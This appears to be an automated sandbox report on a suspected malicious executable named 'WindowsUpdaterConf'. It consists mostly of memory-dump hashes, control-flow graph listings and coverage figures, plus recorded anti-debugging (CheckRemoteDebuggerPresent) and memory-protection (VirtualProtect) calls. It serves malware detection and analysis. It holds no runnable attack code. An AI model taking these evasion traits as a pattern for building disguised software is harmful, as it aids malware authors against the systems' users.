                                                                                          • Instruction ID: 6946c9798f7289baa91495e0fb5539b78174b0423724991b48b9fdfa7c9b4558
                                                                                          • Opcode Fuzzy Hash: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                                                                                          • Instruction Fuzzy Hash: 02B012302081084F8244D6D8E841C14F39DDBC4618354C0ADE80CCB302CF33FC0385C4
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001E.00000002.2346497583.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_30_2_6190000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 544bf6b04cfef94d2bca8890dd401db1b0f879e269e8d89c0cdca7c4b4564a41
                                                                                          • Instruction ID: 65b2bfc50afd8767c67b086d9499db9c822f1aa6914a55d61c7276c32de6a31d
                                                                                          • Opcode Fuzzy Hash: 544bf6b04cfef94d2bca8890dd401db1b0f879e269e8d89c0cdca7c4b4564a41
                                                                                          • Instruction Fuzzy Hash: 85C00274A042048FDB745B74A45C2597AA1AB58382F410569A84BC2398DB344A408B55
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001E.00000002.2346497583.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_30_2_6190000_WindowsUpdaterConf.jbxd

Execution Graph

Execution Coverage: 8.7%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 24
Total number of Limit Nodes: 0
Execution graph (node list): entry at 1940850; API nodes VirtualProtect (19488c0, 19489b8), CloseHandle (1948b80) and CheckRemoteDebuggerPresent (2392e4c, reached from 2392e00 and 2392e08).

Control-flow Graph: function at 6568c18 (calls 6560040 and 656bf28)
                                                                                          Strings
Memory Dump Source
• Source File: 00000021.00000002.2409321653.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_33_2_6560000_WindowsUpdaterConf.jbxd
Similarity
• String ID: %1K$(K1$9Gxv$9Gxv$=<R3${u(F$C\
• API String ID: 0-857792947

Control-flow Graph: function at 6564dc3
                                                                                          Strings
Similarity
• String ID: PHfq$`Qfq$`Qfq
• API String ID: 0-872445281

Control-flow Graph: function 2392e00-2392ed0 (calls CheckRemoteDebuggerPresent)
APIs
• CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 02392E7F
Memory Dump Source
• Source File: 00000021.00000002.2355248401.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_33_2_2390000_WindowsUpdaterConf.jbxd
Similarity
• API ID: CheckDebuggerPresentRemote
• API String ID: 3662101638-0

Control-flow Graph: function 2392e08-2392ed0 (calls CheckRemoteDebuggerPresent)
APIs
• CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 02392E7F
Similarity
• API ID: CheckDebuggerPresentRemote
• API String ID: 3662101638-0

Control-flow Graph: function 1948970-1948a1f (calls VirtualProtect)
APIs
• VirtualProtect.KERNELBASE(?,?,?,?), ref: 019489E4
Memory Dump Source
• Source File: 00000021.00000002.2347478251.0000000001940000.00000040.00000800.00020000.00000000.sdmp, Offset: 01940000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_33_2_1940000_WindowsUpdaterConf.jbxd
Similarity
• API ID: ProtectVirtual
• API String ID: 544645111-0

Control-flow Graph: function at 656bf50 (calls 6567550)
                                                                                          Strings
Similarity
• String ID: Dmq
• API String ID: 0-4031372824

Control-flow Graph: function 1948b40-1948bdd (calls CloseHandle)
Similarity
• API ID: CloseHandle
• API String ID: 2962429428-0

Control-flow Graph: function at 656fc10 (calls 656bf28, 6568a58, 6568760 and code at 23929c1/23929d0, 2392a20/2392a30, 2392a80/2392a90)
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000021.00000002.2409321653.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_33_2_6560000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d623c2be3905cf58ba12278ef033460a8bf907efd899fb8462c6529d814f5e73
                                                                                          • Instruction ID: 1007d6d31232aa7ffd266ab4e716cb74c5a64ee36a75f204e91d8fd0d39c5441
                                                                                          • Opcode Fuzzy Hash: d623c2be3905cf58ba12278ef033460a8bf907efd899fb8462c6529d814f5e73
                                                                                          • Instruction Fuzzy Hash: E9516B34B001428FDB94AB65E49962F77ABFB88B01F508928E946D7385DF389D05CB91
Memory Dump Source
• Source File: 00000021.00000002.2409321653.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_33_2_6560000_WindowsUpdaterConf.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0e29e1eddaa9851fb018cceda6911a4639c86d36e7da04c2a8e983e42b9995c9
• Instruction ID: 1e03b05aa6eceda474376339f490f72ca7b7d1a0110c409c6b92acd55ab996dc
• Opcode Fuzzy Hash: 0e29e1eddaa9851fb018cceda6911a4639c86d36e7da04c2a8e983e42b9995c9
• Instruction Fuzzy Hash: 373190747001098FD759AF68E05926F3BAAFB89B44F508829D902D7385DF385E05CFD1

Execution Graph

Execution Coverage: 9.7%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 24
Total number of Limit Nodes: 0
execution_graph (graph rendering not recovered; the node dump shows edges through CheckRemoteDebuggerPresent, CloseHandle and VirtualProtect)

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 0 6308c18-6308c83 call 6300040 call 630bf28 6 6308c89-630bec4 0->6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000025.00000002.3130182739.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_37_2_6300000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: %1K$(K1$9Gxv$9Gxv$=<R3${u(F$C\
                                                                                          • API String ID: 0-857792947
                                                                                          • Opcode ID: 1343181a39eabb590d3a86ee6ca5a1392612561afd076a4fd272c544922c7fb4
                                                                                          • Instruction ID: 49e1cc433e6dde589c128becb843d63e2f165b84d7f7ba5052b598e8c36db7f0
                                                                                          • Opcode Fuzzy Hash: 1343181a39eabb590d3a86ee6ca5a1392612561afd076a4fd272c544922c7fb4
                                                                                          • Instruction Fuzzy Hash: 1F532E38A012198FCB55DF28C9A469EB7F6FB98305F508199D91EE7384EB349E81CF41

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 767 6242e02-6242e8c CheckRemoteDebuggerPresent 769 6242e95-6242ed0 767->769 770 6242e8e-6242e94 767->770 770->769
                                                                                          APIs
                                                                                          • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 06242E7F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000025.00000002.3129599130.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_37_2_6240000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID: CheckDebuggerPresentRemote
                                                                                          • String ID:
                                                                                          • API String ID: 3662101638-0
                                                                                          • Opcode ID: 5cc7a23c4a9e430191470a773d8f915d520c699351cbd674f36ee67b4c86a152
                                                                                          • Instruction ID: dadfd1046044f2c4383c9697afbf49a0acce2dbba30c94dcf95452b78c817657
                                                                                          • Opcode Fuzzy Hash: 5cc7a23c4a9e430191470a773d8f915d520c699351cbd674f36ee67b4c86a152
                                                                                          • Instruction Fuzzy Hash: 48214AB1D01259CFCB10CFAAD884BEEBBF4AF58310F14845AE859A7341D778A944CF60

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 773 6242e08-6242e8c CheckRemoteDebuggerPresent 775 6242e95-6242ed0 773->775 776 6242e8e-6242e94 773->776 776->775
                                                                                          APIs
                                                                                          • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 06242E7F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000025.00000002.3129599130.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_37_2_6240000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID: CheckDebuggerPresentRemote
                                                                                          • String ID:
                                                                                          • API String ID: 3662101638-0
                                                                                          • Opcode ID: 06e69253be3831b776e52fe0645129dad082876987bba86da6043e82e55866f7
                                                                                          • Instruction ID: 193f5412065e4d9bba8f067d3effa0bd63e29f6801b277ab3dad78446aaadd0b
                                                                                          • Opcode Fuzzy Hash: 06e69253be3831b776e52fe0645129dad082876987bba86da6043e82e55866f7
                                                                                          • Instruction Fuzzy Hash: 5F2128B1D01259CFCB14CF9AD884BEEBBF4AF58320F14845AE859A7250D778A944CF61

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1012 630bf50-630bf74 1013 630bf76-630bfd4 1012->1013 1014 630bfdc-630bfe3 1012->1014 1013->1014 1015 630bfe5-630c019 1014->1015 1016 630c056-630c067 1014->1016 1023 630c021-630c04a 1015->1023 1017 630c069 1016->1017 1018 630c06e-630c090 1016->1018 1017->1018 1026 630c092-630c09b 1018->1026 1027 630c0ff-630c194 call 6307550 1018->1027 1050 630c1fc-630c24e 1023->1050 1052 630c050 1023->1052 1029 630c0aa-630c0b0 1026->1029 1030 630c09d-630c0a2 1026->1030 1043 630c1b5-630c1bb 1027->1043 1034 630c1b0 1029->1034 1035 630c0b6-630c0ba 1029->1035 1030->1029 1034->1043 1035->1027 1038 630c0bc-630c0c5 1035->1038 1040 630c0d4-630c0da 1038->1040 1041 630c0c7-630c0cc 1038->1041 1040->1034 1045 630c0e0-630c0fa 1040->1045 1041->1040 1046 630c1c5 1043->1046 1047 630c1bd 1043->1047 1045->1043 1046->1050 1047->1046 1060 630c250-630c256 1050->1060 1052->1016 1061 630dfda-630dfde 1060->1061 1062 630c25c 1060->1062 1064 630dfe4-630dfef 1061->1064 1065 630ec87-630eca0 1061->1065 1062->1061 1064->1060 1070 630eca2-630eca7 1065->1070 1071 630ec7e-630ec84 1065->1071 1071->1065
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000025.00000002.3130182739.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_37_2_6300000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Dmq
                                                                                          • API String ID: 0-4031372824
                                                                                          • Opcode ID: 8c8c4adf09e216c32a76b5ad38fa4b71d9d821ecb4f11e6ed1d7d5a5a9fe68eb
                                                                                          • Instruction ID: 05483c186bb06f177c195e329945ac402296773eb765b55b4b76d06f0dfbcdf4
                                                                                          • Opcode Fuzzy Hash: 8c8c4adf09e216c32a76b5ad38fa4b71d9d821ecb4f11e6ed1d7d5a5a9fe68eb
                                                                                          • Instruction Fuzzy Hash: 0F91E274A002008FDB58DF68C590A6ABBFAFF89310F11966AD4159B3A1CB35EC45CFD1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000025.00000002.3130182739.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_37_2_6300000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 20823f2359eb9812ee2f4cb25aee828b45b1bbaf920c9ecbe57d4f48108a8388
                                                                                          • Instruction ID: 171973292f86a4cbba921788562fa716bfcbcf51ebec451f1f4451e907a714e5
                                                                                          • Opcode Fuzzy Hash: 20823f2359eb9812ee2f4cb25aee828b45b1bbaf920c9ecbe57d4f48108a8388
                                                                                          • Instruction Fuzzy Hash: A9513B387002448BE758AB64E4A8B7EB7EEEB9C705F109529D906D73C8DF398C45CB91
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000025.00000002.3130182739.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_37_2_6300000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b8594d46dce842dafb8fb3a67f814d9a30b7ef167b0407027a64659cfd939ebb
                                                                                          • Instruction ID: d74ea13b2de57a950bb28cd41005bf650a66ae93b34e31245318184268596b14
                                                                                          • Opcode Fuzzy Hash: b8594d46dce842dafb8fb3a67f814d9a30b7ef167b0407027a64659cfd939ebb
                                                                                          • Instruction Fuzzy Hash: 6B314B386003058FD309AF68E1A476E77BEFBA9708F50502AD9169B388DF385E45CBD1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000025.00000002.3130182739.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_37_2_6300000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3f859edd84beb335cf2dd1a59378dc4b2ab8f73806e6df96212434b02ddd0270
                                                                                          • Instruction ID: 7030177bc8d63c353999008a52f28f7eb924c3f0360431b2c7a8284f4819378a
                                                                                          • Opcode Fuzzy Hash: 3f859edd84beb335cf2dd1a59378dc4b2ab8f73806e6df96212434b02ddd0270
                                                                                          • Instruction Fuzzy Hash: 49F01D347143008BEB68BF24E4B463A33AEFB68B45F40402C8916863D9DB299C48CBD5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000025.00000002.3130182739.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_37_2_6300000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7e49152d35de33eefa2b3e4abac044e8d0b7be69574b41a7a1a3f77d23a7543b
                                                                                          • Instruction ID: bef21fb45656862b34e26b07d5d468050a93a639fb67053eff5fed71f6c32319
                                                                                          • Opcode Fuzzy Hash: 7e49152d35de33eefa2b3e4abac044e8d0b7be69574b41a7a1a3f77d23a7543b
                                                                                          • Instruction Fuzzy Hash: 28E0ED74900218CFD758DF14D9947AD77B9FB48301F0081DAD519A3380DB341E88CF41
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000025.00000002.3130182739.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_37_2_6300000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 85d83120443040cec4cb8c0f1d5c571dcca6ef94423753b43c4f2b84b3dbdd3f
                                                                                          • Instruction ID: b504ca82b02d887d08f91348de2b11ce0f722e592bc22cf792cbf5120f98933f
                                                                                          • Opcode Fuzzy Hash: 85d83120443040cec4cb8c0f1d5c571dcca6ef94423753b43c4f2b84b3dbdd3f
                                                                                          • Instruction Fuzzy Hash: 4AD05E7580420CABCB00EFA0891055E7BF8DB09210B1004A59505D3240EE324A005B81
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000025.00000002.3130182739.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_37_2_6300000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 365d4662ca65810c3155f5ffb80876b8566cc7062d1370f5d8c52032471e5c63
                                                                                          • Instruction ID: a31e0879642c0bc07a3de087e66c66f4ceefb9585ab35283f5988819b55105ae
                                                                                          • Opcode Fuzzy Hash: 365d4662ca65810c3155f5ffb80876b8566cc7062d1370f5d8c52032471e5c63
                                                                                          • Instruction Fuzzy Hash: C9D067B4A141148FDBA59F64E8D879C77B1AB48201F1095EA960AE3384DE304E84CF54
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000025.00000002.3130182739.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_37_2_6300000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6b890a1878f21bb7f09d862592a755ed2ce311562f5f1a0304c6abbbdd52873e
                                                                                          • Instruction ID: 19d07928bc24b9474f7e59cbdd8b8e0d3deed1c7a519eb3c8c8690cf2c067a2b
                                                                                          • Opcode Fuzzy Hash: 6b890a1878f21bb7f09d862592a755ed2ce311562f5f1a0304c6abbbdd52873e
                                                                                          • Instruction Fuzzy Hash: C5C092303082084B8748D69DE851825F3DA9BCC618328C0BDA80DC7352EE23FC038684
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000025.00000002.3130182739.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_37_2_6300000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 541c563c97912ec696b1f2b4f4fda4100d9bab4f7cda9e31e81c4b80c3f6b66f
                                                                                          • Instruction ID: da2056f1b215378797604cee50029afe0ac8c15ebae7ef6ce30028b3983ea043
                                                                                          • Opcode Fuzzy Hash: 541c563c97912ec696b1f2b4f4fda4100d9bab4f7cda9e31e81c4b80c3f6b66f
                                                                                          • Instruction Fuzzy Hash: 7DC02B3010030847C30A3648E0B066A73CFE3ECB08F400015C10A03384CD202D40CB91
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000025.00000002.3130182739.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_37_2_6300000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
• Opcode ID: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
• Instruction ID: 6946c9798f7289baa91495e0fb5539b78174b0423724991b48b9fdfa7c9b4558
• Opcode Fuzzy Hash: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
• Instruction Fuzzy Hash: 02B012302081084F8244D6D8E841C14F39DDBC4618354C0ADE80CCB302CF33FC0385C4
Memory Dump Source
• Source File: 00000025.00000002.3130182739.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_37_2_6300000_WindowsUpdaterConf.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4a6b5beb7b257a7518076e0a1efa55d9696625db7135a66eaf832c0955a6e698
• Instruction ID: 31ffc1d8908856044cf524389f7711f33b139124f192d399d20a6322410553d7
• Opcode Fuzzy Hash: 4a6b5beb7b257a7518076e0a1efa55d9696625db7135a66eaf832c0955a6e698
• Instruction Fuzzy Hash: 5AC00274A182048FDB655B74A02C35D7BA5AB48341F0006A5A84BC2788DB348A408B55
Memory Dump Source
• Source File: 00000025.00000002.3130182739.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_37_2_6300000_WindowsUpdaterConf.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 778481114c374013f58dd504163b08aecaedb20851cd843d8b2e6942ade4442f
• Instruction ID: 4a00f5dc1a4745342057266f99d99f8343528934673bb8150e6a530dc89bb7bf
• Opcode Fuzzy Hash: 778481114c374013f58dd504163b08aecaedb20851cd843d8b2e6942ade4442f
• Instruction Fuzzy Hash: 71C09238250208CFC340DB59D589C10BBE8EF49A2835980D8E50D8B733CB32FC01CA80
Memory Dump Source
• Source File: 00000025.00000002.3130182739.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_37_2_6300000_WindowsUpdaterConf.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 00fb257517fa66d8d82df2fc559de156622b6f4f3f56d113648c417e124a9b6c
• Instruction ID: bde584bcc0a20163e1d20aefd562f14664055d751c7398f878511897cdc0a054
• Opcode Fuzzy Hash: 00fb257517fa66d8d82df2fc559de156622b6f4f3f56d113648c417e124a9b6c
• Instruction Fuzzy Hash: DFB012301042084B8100D6C8D841810F39CDB84518314C099980C47302CA23FC038580
Memory Dump Source
• Source File: 00000025.00000002.3130182739.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_37_2_6300000_WindowsUpdaterConf.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a1babce21274724efa8287aaf6e0cc8d54cb715a11d363b271fa19016c32708c
• Instruction ID: 17b1a5d38795d3e7d94f548e67c7562a63a31787b079201c87deef1e37d1ca41
• Opcode Fuzzy Hash: a1babce21274724efa8287aaf6e0cc8d54cb715a11d363b271fa19016c32708c
• Instruction Fuzzy Hash: 96A02230003B0C82830033B02000020338C8880808B8000F8820C0CA220AB3E8E28088
Memory Dump Source
• Source File: 00000025.00000002.3130182739.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_37_2_6300000_WindowsUpdaterConf.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 58756deec557ff8e869e861b27ef3ae3bb15c8e6cc8ae61306a013b9f71b47b6
• Instruction ID: a9c53da62c9e914517f85d416c7229f4735d8ed807bdebcb9757652e4e3d8f74
• Opcode Fuzzy Hash: 58756deec557ff8e869e861b27ef3ae3bb15c8e6cc8ae61306a013b9f71b47b6
• Instruction Fuzzy Hash: 74A0243000170CC7C30437707104510735CD70030D7400075D10C005114737D010C550
Memory Dump Source
• Source File: 00000025.00000002.3130182739.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_37_2_6300000_WindowsUpdaterConf.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cc53f5542f6cbd0dbc19be969ede8f45e27ff125344104c76433af84d1b591ea
• Instruction ID: 294ba04e15a8e1510f0154c01ba35c6acd312173982bf5236a8dae7ded7f3342
• Opcode Fuzzy Hash: cc53f5542f6cbd0dbc19be969ede8f45e27ff125344104c76433af84d1b591ea
• Instruction Fuzzy Hash: FF90027104860C9F4A516799740966A776CA9455197840191E60D515055A5964108695
Memory Dump Source
• Source File: 00000025.00000002.3130182739.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_37_2_6300000_WindowsUpdaterConf.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3c0474390f02ec4967fbbf273e4026cebe46e60c4a897393eaf33d2d95ee410d
• Instruction ID: c16e17e0cebbe8b2e2ae98251850e4c6c8dfba375a2527dd7fb4ed1aa2777c74
• Opcode Fuzzy Hash: 3c0474390f02ec4967fbbf273e4026cebe46e60c4a897393eaf33d2d95ee410d
• Instruction Fuzzy Hash: DEB0113820C2088FE3A88A00CE283AA3222AB80302F0002A0A002A2280CB320C888B80